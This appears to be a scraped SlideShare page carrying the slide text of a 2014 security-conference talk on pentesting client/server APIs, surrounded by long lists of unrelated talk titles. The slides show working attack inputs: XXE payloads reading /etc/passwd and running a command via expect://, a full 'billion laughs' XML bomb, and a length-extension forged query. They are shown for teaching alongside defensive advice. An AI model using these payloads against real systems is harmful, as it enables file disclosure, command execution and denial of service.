2018 06 Presentation Cloudguard IaaS de Checkpoint2018 06 Presentation Cloudguard IaaS de Checkpoint
2018 06 Presentation Cloudguard IaaS de Checkpointe-Xpert Solutions SA
 
How to Implement Organization Wide Cyber Hygiene?
How to Implement Organization Wide Cyber Hygiene?How to Implement Organization Wide Cyber Hygiene?
How to Implement Organization Wide Cyber Hygiene?SecPod
 
Meeting rooms are talking! are you listening?
Meeting rooms are talking! are you listening?Meeting rooms are talking! are you listening?
Meeting rooms are talking! are you listening?Cisco DevNet
 
Better watch your apps - MJ Keith
Better watch your apps - MJ KeithBetter watch your apps - MJ Keith
Better watch your apps - MJ Keithm j
 
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Codemotion
 
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Codemotion
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIsrandyhoyt
 
Network software gotovaya
Network software gotovayaNetwork software gotovaya
Network software gotovayaVlad Demensky
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
 
2018 06 Presentation Cloudguard SaaS de Checkpoint
2018 06 Presentation Cloudguard SaaS de Checkpoint 2018 06 Presentation Cloudguard SaaS de Checkpoint
2018 06 Presentation Cloudguard SaaS de Checkpoint e-Xpert Solutions SA
 

Similar to CodeFest 2014 - Pentesting client/server API (20)

Microservices Manchester: Security, Microservces and Vault by Nicki Watt
Microservices Manchester: Security, Microservces and Vault by Nicki WattMicroservices Manchester: Security, Microservces and Vault by Nicki Watt
Microservices Manchester: Security, Microservces and Vault by Nicki Watt
 
End to End Security - Check Point
End to End Security - Check PointEnd to End Security - Check Point
End to End Security - Check Point
 
FIDO Masterclass
FIDO MasterclassFIDO Masterclass
FIDO Masterclass
 
TDC2018SP | Trilha Mobile - Case VC+: Como tornar seguro um aplicativo mobile...
TDC2018SP | Trilha Mobile - Case VC+: Como tornar seguro um aplicativo mobile...TDC2018SP | Trilha Mobile - Case VC+: Como tornar seguro um aplicativo mobile...
TDC2018SP | Trilha Mobile - Case VC+: Como tornar seguro um aplicativo mobile...
 
Case VC+: Como tornar seguro um aplicativo mobile payment sem penalizar a exp...
Case VC+: Como tornar seguro um aplicativo mobile payment sem penalizar a exp...Case VC+: Como tornar seguro um aplicativo mobile payment sem penalizar a exp...
Case VC+: Como tornar seguro um aplicativo mobile payment sem penalizar a exp...
 
[WSO2Con USA 2018] Design and Implementation of the Veridium Authenticator: A...
[WSO2Con USA 2018] Design and Implementation of the Veridium Authenticator: A...[WSO2Con USA 2018] Design and Implementation of the Veridium Authenticator: A...
[WSO2Con USA 2018] Design and Implementation of the Veridium Authenticator: A...
 
Expanding APIs beyond the Web
Expanding APIs beyond the WebExpanding APIs beyond the Web
Expanding APIs beyond the Web
 
Check point presentation june 2014
Check point presentation june 2014Check point presentation june 2014
Check point presentation june 2014
 
Steam Learn: HTTPS and certificates explained
Steam Learn: HTTPS and certificates explainedSteam Learn: HTTPS and certificates explained
Steam Learn: HTTPS and certificates explained
 
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
 
2018 06 Presentation Cloudguard IaaS de Checkpoint
2018 06 Presentation Cloudguard IaaS de Checkpoint2018 06 Presentation Cloudguard IaaS de Checkpoint
2018 06 Presentation Cloudguard IaaS de Checkpoint
 
How to Implement Organization Wide Cyber Hygiene?
How to Implement Organization Wide Cyber Hygiene?How to Implement Organization Wide Cyber Hygiene?
How to Implement Organization Wide Cyber Hygiene?
 
Meeting rooms are talking! are you listening?
Meeting rooms are talking! are you listening?Meeting rooms are talking! are you listening?
Meeting rooms are talking! are you listening?
 
Better watch your apps - MJ Keith
Better watch your apps - MJ KeithBetter watch your apps - MJ Keith
Better watch your apps - MJ Keith
 
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
 
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIs
 
Network software gotovaya
Network software gotovayaNetwork software gotovaya
Network software gotovaya
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 
2018 06 Presentation Cloudguard SaaS de Checkpoint
2018 06 Presentation Cloudguard SaaS de Checkpoint 2018 06 Presentation Cloudguard SaaS de Checkpoint
2018 06 Presentation Cloudguard SaaS de Checkpoint
 

Recently uploaded

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 

Recently uploaded (20)

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 

CodeFest 2014 - Pentesting client/server API

  • 2. $ whoami © 2002—2014, Digital Security 2 • Senior Security Auditor at Digital Security • BugHunter: Google, Yandex, Badoo, Yahoo +++ • Writer: habrahabr, Xakep magazine • CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013 • Speaker: CodeFest 2012, ZeroNights 0x03 • Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
  • 3. What are we talking about? © 2002—2014, Digital Security 3 API
  • 4. What are we talking about? © 2002—2014, Digital Security 4 API
  • 5. Hacking via API © 2002—2014, Digital Security 5
  • 6. Hacking via API © 2002—2014, Digital Security 6
  • 7. Hacking via API © 2002—2014, Digital Security 7 From interface to API methods
  • 8. Hacking via API © 2002—2014, Digital Security 8
  • 9. Hacking via API © 2002—2014, Digital Security 9
  • 10. Hacking via API © 2002—2014, Digital Security 10
  • 11. Hacking via API © 2002—2014, Digital Security 11
  • 12. Hacking via API © 2002—2014, Digital Security 12 What should we test? • Logic! • Bypassing restrictions (sqli/xss) • Parameter tampering Developing • Stop hacks and custom implementation in API! Really
  • 13. Hacking via API © 2002—2014, Digital Security 13
  • 14. Hacking via API © 2002—2014, Digital Security 14 ZIP
  • 15. Hacking via API © 2002—2014, Digital Security 15 42 Kb…
  • 16. Hacking via API © 2002—2014, Digital Security 16 42 Kb… …10 Gb?
  • 17. Hacking via API © 2002—2014, Digital Security 17 42 Kb… …10 Gb? …100 Gb?
  • 18. Hacking via API © 2002—2014, Digital Security 18 42 Kb… …10 Gb? …100 Gb? …100 Tb?
  • 19. Hacking via API © 2002—2014, Digital Security 19 42 Kb… …10 Gb? …100 Gb? …100 Tb? …4.5 Pb! http://www.unforgettable.dk/
  • 20. Hacking via API © 2002—2014, Digital Security 20 Say HELLO to ZIP BOMB!
  • 21. Hacking via API © 2002—2014, Digital Security 21 The evil of JavaScript and
  • 22. Hacking via API © 2002—2014, Digital Security 22
  • 23. Hacking via API © 2002—2014, Digital Security 23
  • 24. Hacking via API © 2002—2014, Digital Security 24 http://habrahabr.ru/post/186160/
  • 25. Hacking via API © 2002—2014, Digital Security 25 Crypto
  • 26. Hacking via API © 2002—2014, Digital Security 26 Query signing Sign = sha*(…+DATA+…) APIkey
  • 27. Hacking via API © 2002—2014, Digital Security 27
  • 28. Hacking via API © 2002—2014, Digital Security 28 But why?
  • 29. Hacking via API © 2002—2014, Digital Security 29 Say hello again. To length extension attack
  • 30. Hacking via API © 2002—2014, Digital Security 30 A=1&B=2&C=3 07ce36c769ae130708258fb5dfa3d37ca5a67514 TOKEN=sha1(KEY+DATA)
  • 31. Hacking via API © 2002—2014, Digital Security 31 Some have hijacked just 1 request…
  • 32. Hacking via API © 2002—2014, Digital Security 32 What does the attacker know? • Original data • Sign (token)
  • 33. Hacking via API © 2002—2014, Digital Security 33 What does the attacker want? Change some data / change params
  • 34. Hacking via API © 2002—2014, Digital Security 34 A=1&B=2&C=3x80x00x00…x02&C=4
  • 35. Hacking via API © 2002—2014, Digital Security 35 Can sign new query without API key! Vkontakte: sig = md5(name1=value1name2=value2api_secret) Mail.RU sig = md5(uid + params + private_key) http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
  • 36. Hacking via API © 2002—2014, Digital Security 36 Request hijacking… How?
  • 37. Hacking via API © 2002—2014, Digital Security 37
  • 38. Hacking via API © 2002—2014, Digital Security 38
  • 39. Hacking via API © 2002—2014, Digital Security 39
  • 40. Hacking via API © 2002—2014, Digital Security 40
  • 41. Hacking via API © 2002—2014, Digital Security 41
  • 42. Hacking via API © 2002—2014, Digital Security 42
  • 43. Hacking via API © 2002—2014, Digital Security 43
  • 44. Hacking via API © 2002—2014, Digital Security 44
  • 45. Hacking via API © 2002—2014, Digital Security 45 XML? XML entities!
  • 46. Hacking via API © 2002—2014, Digital Security 46 DTD Example: <!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright W3Schools."> XML example: <author>&writer;&copyright;</author>
  • 47. Hacking via API © 2002—2014, Digital Security 47 XML entities? External Entity!
  • 48. Hacking via API © 2002—2014, Digital Security 48 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
  • 49. Hacking via API © 2002—2014, Digital Security 49 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM “expect://id" >]> <foo>&xxe;</foo>
  • 50. Hacking via API © 2002—2014, Digital Security 50 XML Bombs!
  • 51. Hacking via API © 2002—2014, Digital Security 51 <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
  • 52. What are we talking about? © 2002—2014, Digital Security 52 Man in the Middle
  • 53. Hacking via API © 2002—2014, Digital Security 53 Examples?
  • 54. Hacking via API © 2002—2014, Digital Security 54 2013-11-19 by Reginaldo Silva
  • 55. Hacking via API © 2002—2014, Digital Security 55 https://www.facebook.com/BugBounty/posts/778897822124446 http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
  • 56. Hacking via API © 2002—2014, Digital Security 56 Testing: • https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) • XXE to RCE https://gist.github.com/joernchen/3623896 Development: • Disable entities
  • 57. Hacking via API © 2002—2014, Digital Security 57 Finally: • Re-test all interface restrictions; • Specific compressions; • JS callbacks; • Crypto + SSL test + hardcoded credentials (hackapp.com); • XML - XXE; • Anything else :]
  • 58. twitter.com/sergeybelove sbelov@dsec.ru Digital Security в Москве: (495) 223-07-86 Digital Security в Санкт-Петербурге: (812) 703-15-47 Hacking via API Thanks for your attention! Questions? © 2002—2014, Digital Security 58